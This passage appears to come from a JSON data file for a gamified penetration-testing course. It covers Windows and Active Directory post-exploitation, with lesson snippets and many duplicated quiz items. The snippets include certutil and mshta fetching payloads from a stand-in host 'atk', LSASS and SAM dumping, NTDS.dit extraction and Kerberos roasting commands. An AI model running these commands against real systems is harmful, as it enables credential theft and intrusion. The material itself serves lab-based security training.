enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"lolbins","cat":"Post-Exploitation","title":"LOLBins","diff":2,"xp":150,"intro":"Legitimate tools for malicious use.","sections":[{"type":"text","content":"Legitimate tools for malicious use."},{"type":"code","lang":"bash","content":"certutil -urlcache -split -f http://atk/payload.exe payload.exe\nmshta http://atk/payload.hta"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why effective?","opts":["Faster","Signed binaries, not flagged by AV","Encrypted","Smaller"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"The first thing to do after getting a shell is...","opts":["Delete logs","Stabilize the shell and enumerate","Install a rootkit","Launch an attack on another target"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"ad-enum-post","cat":"Post-Exploitation","title":"AD Enumeration","diff":2,"xp":150,"intro":"Enumerate AD objects.","sections":[{"type":"text","content":"Enumerate AD objects."},{"type":"code","lang":"bash","content":"SharpHound.exe -c All\nGet-DomainUser\nFind-LocalAdminAccess"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"AD attack path tool?","opts":["PowerView","BloodHound","Mimikatz","Rubeus"],"ans":1},{"type":"quiz","q":"LSASS stores...","opts":["Firewall rules","Cached credentials and tokens","Network config","Registry keys"],"ans":1},{"type":"quiz","q":"Lateral movement means...","opts":["Moving to other machines on the network","Physical access","Escalating privileges","Exfiltrating data"],"ans":0},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"asreproast","cat":"Post-Exploitation","title":"AS-REP Roasting","diff":2,"xp":150,"intro":"Crack accounts without pre-auth.","sections":[{"type":"text","content":"Crack accounts without pre-auth."},{"type":"code","lang":"bash","content":"GetNPUsers.py domain/ -usersfile users.txt -no-pass\nhashcat -m 18200 hashes.txt rockyou.txt"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Must be disabled?","opts":["Delegation","Pre-authentication","Encryption","Renewal"],"ans":1},{"type":"quiz","q":"A C2 framework provides...","opts":["Encryption","Command and control of compromised hosts","Vulnerability scanning","Log management"],"ans":1},{"type":"quiz","q":"Which tool is best for AD enumeration?","opts":["nmap","BloodHound","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"pivot-tools","cat":"Post-Exploitation","title":"Pivoting Tools","diff":2,"xp":150,"intro":"Network pivoting tools.","sections":[{"type":"text","content":"Network pivoting tools."},{"type":"code","lang":"bash","content":"ligolo-proxy -selfcert\nsshuttle -r user@pivot 10.0.0.0/24"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"VPN-like tunnel?","opts":["Chisel","SSHuttle","Socat","Netcat"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"ntds-dump","cat":"Post-Exploitation","title":"NTDS.dit Extraction","diff":3,"xp":200,"intro":"Dump all AD hashes.","sections":[{"type":"text","content":"Dump all AD hashes."},{"type":"code","lang":"bash","content":"vssadmin create shadow /for=C:\nsecretsdump.py -ntds ntds.dit -system system.hiv LOCAL"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"AD hash file?","opts":["SAM","NTDS.dit","SYSTEM","SECURITY"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"cred-dump","cat":"Post-Exploitation","title":"Credential Dumping","diff":2,"xp":150,"intro":"Extract Windows creds.","sections":[{"type":"text","content":"Extract Windows creds."},{"type":"code","lang":"bash","content":"procdump.exe -ma lsass.exe lsass.dmp\nreg save HKLMSAM sam.hiv"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Credential process?","opts":["explorer","lsass.exe","svchost","csrss"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"rubeus","cat":"Post-Exploitation","title":"Rubeus Kerberos","diff":3,"xp":200,"intro":"Kerberos attack toolkit.","sections":[{"type":"text","content":"Kerberos attack toolkit."},{"type":"code","lang":"bash","content":"Rubeus.exe asreproast\nRubeus.exe kerberoast\nRubeus.exe ptt /ticket:b64"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Rubeus targets?","opts":["NTLM","Kerberos","LDAP","SMB"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"lsass-dump","cat":"Post-Exploitation","title":"LSASS Dump Methods","diff":2,"xp":150,"intro":"Multiple LSASS dump ways.","sections":[{"type":"text","content":"Multiple LSASS dump ways."},{"type":"code","lang":"bash","content":"rundll32.exe comsvcs.dll,MiniDump <pid> lsass.dmp full"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer 